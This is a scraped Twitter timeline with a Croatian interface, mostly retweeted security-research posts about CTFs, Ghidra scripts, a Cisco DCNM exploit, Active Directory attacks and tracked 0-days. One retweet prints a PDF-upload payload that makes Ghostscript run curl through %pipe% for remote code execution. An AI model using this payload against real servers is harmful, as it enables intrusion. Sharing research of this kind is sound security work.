Tweetovi

Blokirali ste korisnika/cu @enio_4491

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @enio_4491

  1. proslijedio/la je Tweet
    22. sij

    So has just finished streaming 7th installment of solving PicoCTF challenges and I've finished editing part 2 of solving Hitcon's CoreDumb with Ghidra so if you don't have yet enough 👉 📺

    Poništi
  2. proslijedio/la je Tweet

    last use case for today Yes, it's also dangerous for Microsoft VBA macro (especially when you think "Disable all Macros except digitally signed" will protect you)

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet

    Another use case for 😘 After my: - Authenticode: & - Outlook S/MIME: now... Microsoft Word, Excel & PowerPoint 🤪 (already existing many TLS browser POC, I will not make another one)

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet

    Ho, by the way, is not only about TLS & Authenticode... it's also for S/MIME and other signatures. Yes, it's also valid against mail signature verification ❤️ I hope nobody rely on it for legal / workflow validation

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    14. sij

    I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell PoC exploit code:

    Poništi
  6. proslijedio/la je Tweet
    10. sij

    I'm releasing ghidra scripts that I made for pwn and reversing tasks, starting with this set of scripts to replace linux/libc magic numbers with readable names for aarch64, amd64/i386, arm/thumb, hppa, m68k, mips, ppc, ppc64, sh, sh4, sparc and sparc64.

    Poništi
  7. proslijedio/la je Tweet
    9. sij

    Do you struggle to understand in environment ? This new article may help clarify things by simply explaining how Kerberos works. It is the first of a serie of posts about attacking Active Directory. Stay tuned 🙃

    Poništi
  8. proslijedio/la je Tweet
    9. sij

    Quick reminder that we're still updating the "0day detected in-the-wild" spreadsheet here: . The first entry for 2020 is now in the books -- CVE-2019-17026 is a type confusion issue in the JIT engine for Firefox, detected in active attacks by Qihoo 360 ATA.

    Poništi
  9. proslijedio/la je Tweet
    9. sij

    The interesting part is how to convert a limited file writing into RCE :P

    Poništi
  10. proslijedio/la je Tweet

    Day 2 of our Top 5 bugs for 2019 is an LPE in win32k.sys through indexed color palettes. The deep and thorough analysis is provided by Marcin Wiązowski, who reported the bug.

    Poništi
  11. proslijedio/la je Tweet
    14. pro 2019.
    Poništi
  12. proslijedio/la je Tweet
    23. stu 2019.

    For a very particular reason, I needed to compile the WinAFL fuzzer, though the project offers binary versions for x86 and x64, and I've noticed why many people have problems to do it on their own. Thus, I've made a short procedure to do it:

    Poništi
  13. 23. stu 2019.

    This made it all worth it! Thank you , and everyone that made possible.

    Poništi
  14. proslijedio/la je Tweet
    21. stu 2019.

    Well, this might be useless, but i wrote a tool to decompile VBA pcode based on 's pcodedmp. Might check if it should be included in . ->

    Poništi
  15. proslijedio/la je Tweet
    18. stu 2019.

    The BabyKernel Windows exploitation challenge from last week's is up on GitHub:

    Poništi
  16. proslijedio/la je Tweet
    13. stu 2019.

    CVE-2019-1347: When a mouse over a file is enough to crash your system

    Poništi
  17. proslijedio/la je Tweet
    12. stu 2019.

    Shipping soon. We have a lot to ship this year so please be patient.

    Poništi
  18. proslijedio/la je Tweet
    7. stu 2019.

    RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl ) ) .putdeviceparams quit

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    6. stu 2019.
    Poništi
  20. proslijedio/la je Tweet

    That brings Tokyo 2019 to a close. Congrats to on successfully defending their Master of Pwn title. In two days, they racked up $195,000 for their research. Congrats!

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·